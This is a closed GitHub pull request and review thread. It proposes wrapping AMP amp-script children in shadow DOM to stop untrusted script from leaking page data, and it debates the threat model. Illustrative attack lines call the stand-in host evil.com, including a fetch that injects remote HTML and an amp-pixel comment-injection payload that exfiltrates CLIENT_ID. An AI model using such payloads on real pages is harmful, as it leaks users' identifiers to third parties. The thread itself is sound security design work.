### PR TITLE
amp-script: Shadow children

### PR DESCRIPTION
**Pull request by choumx**
### Problem

One of AMP's nice properties is that it's a safe, portable content format. This is in large part due to AMP's static, declarative markup -- publishers can trust that rendered AMP pages reflect their authored intent.

amp-script, on the other hand, is not declarative by design. The author JS can be a black box with respect to publisher trust. One extreme example:

```js
// author.js
fetch('evil.com/htmlForLeakingAMPData')
    .then(r => r.text())
    .then(text => document.innerHTML = text);
```

Mixing static, declarative ("trusted") AMP markup with non-declarative ("untrusted") markup is problematic because status quo security features assume the former.

One example is AMP variable substitutions e.g. [per-use opt-in](https://github.com/ampproject/amphtml/blob/master/spec/amp-var-substitutions.md#per-use-opt-in):
> Link substitution requires per-use opt-in as an added security measure and to affirm the intention to use variable substitution.

This is important for sensitive variable substitutions like [CLIENT_ID](https://github.com/ampproject/amphtml/blob/master/spec/amp-var-substitutions.md#client-id).

More precisely, the impact of untrusted content are the following:

1. Leaking data stored in substitution variables (above)
2. Leaking data added to the page DOM (e.g. rendered amp-list markup)
3. Leaking data via user interaction (e.g. amp-analytics event triggers) 

### Proposal

- (1) can be addressed by requiring publishers to provide a map of domain to variable substitutions allowed for that domain. amp-script will filter/ignore variables that are not present in this map.
- (2) and (3) can be addressed by encapsulating amp-script children in shadow DOM, which provides a DOM query and event re-targeting boundary. This has the added benefit that it enables `<style>` injection in amp-script a la CSS-in-JS.

This PR implements the shadow DOM proposal.

### Caveats

- The pre-hydration children of amp-script (along with relevant CSS) will need to be duplicated into the shadow root during initialization for seamless UX, which has a non-zero performance cost.
- Shadow DOM is not available in all browsers (notably, Edge and IE), so "friendly iframe" is used as a fallback case. This means that media queries and viewport units will work differently on these browsers.

### Alternatives

1. Instead of drawing this trusted/untrusted DOM boundary via shadow DOM, implement this on an API level e.g. use a special internal `querySelector` API that respects the virtual boundary. Brittleness is a major problem.
2. Declare this as out-of-scope. I.e. define `<amp-script>`-rendered markup as trusted by publisher, so there is no trust escalation and this feature is not necessary.

### CODE REVIEW

**Comment by cramforce** [comment]
I think the 3 examples given (CLIENT_ID, amp-list, event-triggers) are not secret and it isn't problematic for them to be read by amp-script. Are there examples where it is definitely problematic?

**Comment by choumx** [comment]
If `CLIENT_ID` and (possible) user data in amp-list are not problematic, then no. 

The operating assumption here is that JS-rendered markup has lower trust, and this PR avoids trust escalation in AMP.

Alternatively:
> Declare this as out-of-scope. I.e. define <amp-script>-rendered markup as trusted by publisher, so there is no trust escalation and this feature is not necessary.

**Comment by cramforce** [comment]
The whole point of CLIENT_ID is to be send to the publisher, so reading it in JS is totally fine. I'd even provide an API to directly read all variables in `amp-script`.

We need to go very deliberate, but I'm not immediately aware of any DOM exposed data that we would not want the owner of the page to read.

**Comment by choumx** [comment]
Agree there's no problem with the publisher reading any of this data. 

The issue is data may leak to _other_ parties.

Contrived example:
```js
fetch('evil.com')
    .then(r => r.text())
    .then(text => document.innerHTML = text);
```

More realistic example: 
- UI widget for "user comments" that doesn't escape HTML (oops). 
- Nefarious user submits the following comment:
```html
Let's collect CLIENT_ID of every user that sees this comment!
<amp-pixel src="evil.com?CLIENT_ID"></amp-pixel>
```

So to clarify, the argument is:
1. Publisher HTML == high trust
2. Publisher JS -> HTML == low trust (!)

Whether (2) is true or not is a matter of definition: "how responsible is a publisher over their JS?"

**Comment by cramforce** [comment]
I understand the concern now. We should probably agree on a thread model.

So the thread-model is:

Be robust is publisher is tricked into generating HTML that they shouldn't
have.

I agree that amp-script increases attack surface, but it can totally
already happen with the same comment trick where the HTML is server-side
rendered.

My tendency is to say, that "must be robust against HTML injection" is
outside the threat model.

**Comment by choumx** [comment]
Closing in favor of something with less performance overhead and more targeted for AMP particulars.

**Pull request closed without merging**
